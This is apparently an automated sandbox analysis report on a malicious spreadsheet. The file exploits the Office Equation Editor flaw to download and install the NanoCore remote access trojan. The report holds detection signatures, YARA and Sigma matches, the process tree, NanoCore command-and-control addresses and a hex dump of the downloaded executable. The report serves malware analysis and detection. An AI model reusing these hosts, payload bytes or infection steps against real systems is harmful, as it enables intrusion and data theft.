Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Enclosed.xlsx

Overview

General Information

Sample Name:Enclosed.xlsx
Analysis ID:483371
MD5:307b2db43e9e3b04e429cdd9d7df08ad
SHA1:58a8d2e79a4984c457f779c34e6a3147a2a66d3f
SHA256:d902487a332eb4be203d196abe75aa72b2fed223df29fb3112aa27e5b54109df
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1936 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2652 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2224 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4C658DB84A58CE7EC0C2F2EB9F14C97C)
      • sys30.exe (PID: 2420 cmdline: 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe' MD5: 4C658DB84A58CE7EC0C2F2EB9F14C97C)
  • sys30.exe (PID: 3048 cmdline: 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe' MD5: 4C658DB84A58CE7EC0C2F2EB9F14C97C)
    • sys30.exe (PID: 2652 cmdline: C:\Users\user\AppData\Local\sys4h57g\sys30.exe MD5: 4C658DB84A58CE7EC0C2F2EB9F14C97C)
    • sys30s.exe (PID: 2256 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 2620 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 1816 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 1948 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 1012 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 2828 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 2520 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 2548 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 1996 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 408 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 1856 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 1228 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 2700 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 1864 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 2668 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 3004 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 704 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 908 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 1284 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
      • sys30s.exe (PID: 2124 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
    • sys30s.exe (PID: 2612 cmdline: 'C:\Users\user\AppData\Local\Temp\sys30s.exe' MD5: 0E362E7005823D0BEC3719B902ED6D62)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x4bbb:$x2: NanoCore.ClientPluginHost
  • 0x6a6b:$s4: PipeCreated
00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
Click to see the 50 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
9.2.sys30.exe.38bc03e.28.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x6da5:$x1: NanoCore.ClientPluginHost
  • 0x6dd2:$x2: IClientNetworkHost
9.2.sys30.exe.38bc03e.28.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x6da5:$x2: NanoCore.ClientPluginHost
  • 0x7d74:$s2: FileCommand
  • 0xc776:$s4: PipeCreated
  • 0x6dbf:$s5: IClientLoggingHost
9.2.sys30.exe.640000.6.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x6da5:$x1: NanoCore.ClientPluginHost
  • 0x6dd2:$x2: IClientNetworkHost
9.2.sys30.exe.640000.6.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x6da5:$x2: NanoCore.ClientPluginHost
  • 0x7d74:$s2: FileCommand
  • 0xc776:$s4: PipeCreated
  • 0x6dbf:$s5: IClientLoggingHost
7.2.sys30.exe.38e56c8.10.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 102 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\sys4h57g\sys30.exe, ProcessId: 2652, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 13.238.159.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2652, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2652, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\sys4h57g\sys30.exe, ProcessId: 2652, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2652, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2224
Sigma detected: Execution from Suspicious FolderShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2652, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2224

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\sys4h57g\sys30.exe, ProcessId: 2652, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\sys4h57g\sys30.exe, ProcessId: 2652, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Enclosed.xlsxReversingLabs: Detection: 29%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeMetadefender: Detection: 13%Perma Link
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeJoe Sandbox ML: detected
Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
Source: 9.2.sys30.exe.560000.3.unpackAvira: Label: TR/NanoCore.fadte
Source: 9.2.sys30.exe.70000.0.unpackAvira: Label: TR/Dropper.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficDNS query: name: www.google.com
Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]6_2_0038DB3F
Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]6_2_0038BC70
Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 00384610h6_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then mov dword ptr [ebp-40h], 00000001h7_2_0038D750
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]7_2_0038BC70
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then jmp 00384610h7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then jmp 00C29F46h7_2_00C29E08
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then jmp 00C2B4CCh7_2_00C2B338
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then jmp 00C29F46h7_2_00C29DF9
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then jmp 00C2B4CCh7_2_00C2B328
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]9_2_0062F300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]9_2_0062F2FD
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]9_2_00629A02
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001D0797h11_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001D0797h11_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001C0797h12_2_001C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001C0797h12_2_001C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00330797h13_2_00330560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00330797h13_2_00330550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001F0797h14_2_001F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001F0797h14_2_001F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00210797h15_2_00210560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00210797h15_2_00210550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 003A0797h16_2_003A0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 003A0797h16_2_003A0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002E0797h17_2_002E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002E0797h17_2_002E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001E0797h18_2_001E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001E0797h18_2_001E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001D0797h19_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 001D0797h19_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00690797h20_2_00690560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00690797h20_2_00690550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00450797h21_2_00450560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00450797h21_2_00450550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00250797h22_2_00250560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00250797h22_2_00250550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 003F0797h23_2_003F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 003F0797h23_2_003F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00190797h24_2_00190560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00190797h24_2_00190550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002F0797h25_2_002F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002F0797h25_2_002F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002D0797h26_2_002D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002D0797h26_2_002D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00280797h27_2_00280560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00280797h27_2_00280550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00320797h28_2_00320560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00320797h28_2_00320550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002C0797h29_2_002C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 002C0797h29_2_002C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00220797h30_2_00220560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exeCode function: 4x nop then jmp 00220797h30_2_00220550
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.238.159.178:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.217.168.36:443
Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 194.5.98.103:5230
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49183 -> 194.5.98.103:5230
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:48:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Tue, 14 Sep 2021 18:45:13 GMTETag: "a2e00-5cbf8fb685aa3"Accept-Ranges: bytesContent-Length: 667136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 60 7f 18 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 24 0a 00 00 08 00 00 00 00 00 00 ce 43 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 43 0a 00 4b 00 00 00 00 60 0a 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 23 0a 00 00 20 00 00 00 24 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 04 04 00 00 00 60 0a 00 00 06 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 43 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ec 08 00 e4 56 01 00 03 00 02 00 47 00 00 06 b8 79 01 00 e0 6b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 20 9c 01 00 00 8d 01 00 00 01 25 d0 64 01 00 04 28 01 00 00 0a 80 65 01 00 04 20 94 00 00 00 8d 05 00 00 01 25 d0 66 01 00 04 28 01 00 00 0a 80 67 01 00 04 2a 1e 02 28 02 00 00 0a 2a 26 00 02 28 05 00 00 0a 00 2a ce 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 73 0a 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 0e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 0f 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 14 00
Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
